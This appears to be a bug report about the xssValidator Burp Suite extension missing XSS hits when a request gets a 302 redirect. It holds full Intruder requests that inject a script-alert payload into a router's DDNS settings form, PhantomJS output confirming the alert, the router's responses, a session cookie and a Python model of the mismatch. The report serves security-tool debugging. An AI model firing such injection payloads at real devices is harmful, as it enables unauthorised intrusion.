Hi again,
I found that xssValidator won't append the grep phrase to the response when it gets a 30x redirection.
But I can find the prompt in the PhantomJS Output and BurpSuite Extender Output, like below:
On alert: 299792458
Response: {"value":1,"msg":"XSS found: alert(299792458)"}
XSS Found
This causes BurpSuite Intruder not to flag the grep phrase.
Thank you :)
Chris
Intruder options:
Attack Results
✓ Store requests
✓ Store responses
✓ Make unmodified baseline request
✓ Store full payloads
Grep - Match
✓ Flag result items with responses matching these expressions: fy7sdufsuidfhuisdf
✓ Match type: Simple string
Grep - Payloads
✓ Search responses for payload strings
✓ Match against pre-URL-encoded payloads
Redirections
✓ Follow redirections: In-scope only
Intruder Request 1:
POST /cgi-bin/setup_dns_ddns.exe HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Content-Length: 146
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close
page=dns_ddns_main&logout=&ddns_provider=0&ddns_domainame="%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c"&ddns_account=XSS4&ddns_password=XSS5
PhantomJS Output 1:
Received request with method type: POST
Processing Post Request
Beginning to parse page
URL: http://192.168.1.1/cgi-bin/setup_dns_ddns.exe
Headers: POST /cgi-bin/setup_dns_ddns.exe HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Content-Length: 146
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close
page=dns_ddns_main&logout=&ddns_provider=0&ddns_domainame="%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c"&ddns_account=XSS4&ddns_password=XSS5
Intruder Response 1:
HTTP/1.1 302 Found
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Location: http://192.168.1.1/wait.stm
Content-type: text/html
<HEAD><TITLE>302 Document moved</TITLE></HEAD>
<BODY><H1>302 Document moved</H1>
This document has moved <A HREF="http://192.168.1.1/wait.stm</A>.<P>
</BODY>
fy7sdufsuidfhuisdf
Intruder Request 2:
GET /wait.stm HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close
PhantomJS Output 2:
Received request with method type: POST
Processing Post Request
Beginning to parse page
URL: http://192.168.1.1/wait.stm
Headers: GET /wait.stm HTTP/1.1
Host: 192.168.1.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
DNT: 1
Referer: http://192.168.1.1/dns_ddns_main.stm
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.8,en;q=0.6,zh-CN;q=0.4
Cookie: defpg=; aDuPtHh_OSPPH3=HKujEEqKwNU0OHDYORMzckBa3VNn524ZVHhfBas5xrrjtIuYJFFzv
Connection: close
On alert: 299792458
Intruder Response 2:
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: max-age=0, must-revalidate
Connection: close
Content-type: text/html
Content-length: 1381
Accept-Ranges: bytes
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script language="javascript">
//setTimeout('document.location.href="dns_ddns_main.stm";', 10000);
var my_time = 10000 / 100;
var mybar = '';
var cur_time = 0;
function zero_run() {
for (var i = 0 ; i < 100 ; i++) {
mybar = mybar + '|';
// window.status = i + '%' + ' ' + mybar;
for (var j = 0 ; j < 10000 ; j++) ;
}
// window.status="";
document.location.href="dns_ddns_main.stm";
}
function timebegin() {
if (my_time == 0) {
setTimeout("zero_run()", 100);
}
else if (cur_time < 100) {
mybar = mybar + '|';
// window.status = cur_time + '%' + ' ' + mybar;
setTimeout("timebegin()", my_time);
cur_time++;
}
else {
// window.status="";
document.location.href="dns_ddns_main.stm";
}
}
timebegin();
</script>
<style type="text/css">
.waitcss {color: #FF6600; font-family: sans-serif; font-size: 9pt; text-align: left; font-weight : bold;}
</style>
</head>
<body bgcolor=#FFFFFF>
<p align=center> </p>
<p align=center> </p>
<p align=center> </p>
<p align=center> </p>
<p align=center> </p>
<p align=center><span class="waitcss">Guardando configuración. POR FAVOR NO APAGUES EL LIVEBOX<br><br><input type=image src="/images/clock.gif" border=0> </span></p>
</body>
</html>
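A small Python model of the mismatch the report describes, added here as an illustration and not code from xssValidator or Burp: the grep phrase lands on the 302 hop, while Intruder's Grep-Match inspects the response it displays after following in-scope redirections. The `SCOPE_HOSTS` set, the `203.0.113.9` out-of-scope host and the response chains are constructed stand-ins mirroring the report.

```python
from urllib.parse import urlparse

# GREP_PHRASE is the Grep-Match string from the report; SCOPE_HOSTS is a
# constructed stand-in for Burp's target scope ("Follow redirections: In-scope only").
GREP_PHRASE = "fy7sdufsuidfhuisdf"
SCOPE_HOSTS = {"192.168.1.1"}


def displayed_hop(chain):
    """Index of the response Intruder keeps for the result item.

    Hypothetical emulation of "Follow redirections: In-scope only": walk the
    chain while the hop is a 3xx whose Location is in scope; stop at the
    first non-3xx hop or at a redirect pointing out of scope.
    """
    idx = 0
    while 300 <= chain[idx]["status"] < 400 and idx + 1 < len(chain):
        target = urlparse(chain[idx]["headers"].get("Location", ""))
        if target.hostname not in SCOPE_HOSTS:
            break  # out-of-scope redirect is not followed; the 3xx is displayed
        idx += 1
    return idx


def intruder_grep_match(chain):
    """Grep-Match as Intruder applies it: only the displayed response is searched."""
    return GREP_PHRASE in chain[displayed_hop(chain)]["body"]


def any_hop_grep_match(chain):
    """Grep every hop of the chain; this is what would catch the phrase on the 302."""
    return any(GREP_PHRASE in hop["body"] for hop in chain)


# Constructed chain mirroring the report: the phrase was appended to the 302
# body, the followed wait.stm page carries no phrase.
CHAIN_302 = [
    {"status": 302,
     "headers": {"Location": "http://192.168.1.1/wait.stm"},
     "body": "<BODY><H1>302 Document moved</H1></BODY>" + GREP_PHRASE},
    {"status": 200, "headers": {},
     "body": "<html><body>Guardando configuración</body></html>"},
]

# Same 302 hop, but redirecting to a constructed out-of-scope host: Intruder
# then displays the 302 itself, so the phrase is seen by Grep-Match.
CHAIN_OUT_OF_SCOPE = [
    {**CHAIN_302[0], "headers": {"Location": "http://203.0.113.9/wait.stm"}},
    CHAIN_302[1],
]
```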